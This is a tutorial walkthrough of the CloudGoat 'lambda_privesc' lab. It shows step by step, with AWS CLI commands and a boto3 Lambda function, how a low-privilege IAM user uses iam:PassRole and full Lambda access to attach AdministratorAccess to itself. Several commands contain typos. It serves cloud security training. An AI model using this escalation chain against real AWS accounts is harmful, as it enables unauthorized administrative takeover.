[AWS-security]How to conduct lambda privilege escalation
What we will do in this article
Conduct lambda privilege escalation attack using CloudGoat
You can see how to set up an initial environment here
Senario: lambda_privesc
Summary
Starting as the IAM user Chris, the attacker discovers that they can assume a role that has full Lambda access and pass role permissions. The attacker can then perform privilege escalation to obtain full admin access.
Goal
Acquire full admin privileges.
Walkthrough
step1 deploy
We need to deploy the scenario on AWS with this command
./cloudgoat.py create lambda_privesc
You can see that the access and secret keys for Chris are provided.
I can see the new user in the console as well
step2 create a profile(Chris)
You can create a profile(Chris) using the access and secret keys in the previous step.
aws configure --profile Chris
step3 enumerate the policies
You can use AWS CLI commands
The attacker realizes they are able to list and assume IAM roles. There are two interesting IAM roles: lambdaManager and debug.
aws iam list-roles --profile Chris | grep ['debug':'lambdaManager']
aws iam list-attached-role-policies --role-name <role-name> --profile Chris
step4 Review the details of attached policy to Chris
Lets check the details of attached policy to Chris
aws iam get-policy --policy-arn arn:aws:iam::362364726861:policy/cg-lambdaManager-policy-cgidnt7ccq4w83 --profile Chris
So this is v1. Get the specific information about v1.
The attacker looks at the attached policies for the two IAM roles and realizes lambdaManager has full lambda access and pass role permissions and the debug role has full administrator privileges.
aws iam get-policy-version --policy-arn arn:aws:iam::362364726861:policy/cg-lambdaManager-policy-cgidnt7ccq4w83 --version-id v1 --profile Chris
So what we can see is full lambda access and pass role permissions
1:lambda:*
2:iam:PassRole
So this means that attacker can escalate privileges by passing an existing IAM role to new Lambda function and run the code by invoking the function through the AWS API.This would give a user access to the privileges associated with any Lambda service role that exists in the account, which could range from no privilege escalation to full administrator access to the account.
The attacker then tries to assume each role but realizes that they only have sufficient privileges to assume the lambdaManager role, and that the debug role can only be assumed by a Lambda function.
I try to assume the debug role, but access is denied because of permission
aws sts assume-role --role-arn <arn name> --role-session-name <any new role name> --profile Chris
But if I try to assume the lambda role, I can see the credentials.
aws sts assume-role --role-arn arn:aws:iam::362364726861:role/cg-lambdaManager-role-cgidnt7ccq4w83 --role-session-name test_lambda --profile Chris
The attacker now leverages the lambdaManager role to perform a privilege escalation using a Lambda function.
step5 create a lambda function
lets configure the IAM credentail on AWS CLI first
In order to include the session token, you need to edit this file. It might look like this.
vi ~/.aws/credentials
Lets create a lambda function that will attach the admin policy to Chris
vi lambda_function.pythe attacker writes a script that will attach the administrator policy to the IAM user “Chris”.
The inside of the file looks like this. #Be careful about indentation.
import boto3def lambda_handler(event, context):client = boto3.client('iam')response = client.attach_user_policy(UserName = 'chris-cgidnt7ccq4w83', PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')return responsea
Lets zip the file.
apk add zip
zip lamba_function.zip lambda_function.py
using the lambdaManager role, the attacker creates a Lambda function, specifying the code, and set the lambda execution role to the debug role.
run this command to create a lambda function called admin.
aws lambda create-function --function-name admin --runtime python3.6 --role arn:aws:iam::362364726861:role/cg-debug-role-cgidnt7ccq4w83 --handler lambda_function.lambda.handler --zip-file fileb://lamba_function.zip --profile LambdaManager --region ap-northeast-1
step6 invoke the function
Attacker uses the lambdaManager role, the attacker invokes the Lambda function, causing the administrator policy to be attached to the “Chris” user and thus gaining full admin access.
Run this command to invoke the function
aws lambda invoke --function-name admin output.txt --profile LambdaManager --region ap-northeast-1
step7 check a new policy for Chris
run this command to check a new policy attached to Chris
aws iam list-attached-user-policies --user-name chris-cgidnt7ccq4w83 --profile Chris
If you see the created roles, you can see them.
step8 cleanup
Run this command to destroy the resources that are used in this article.
./cloudgoat.py destroy lambda_privesc
After destroying, we don’t see Chris anymore.
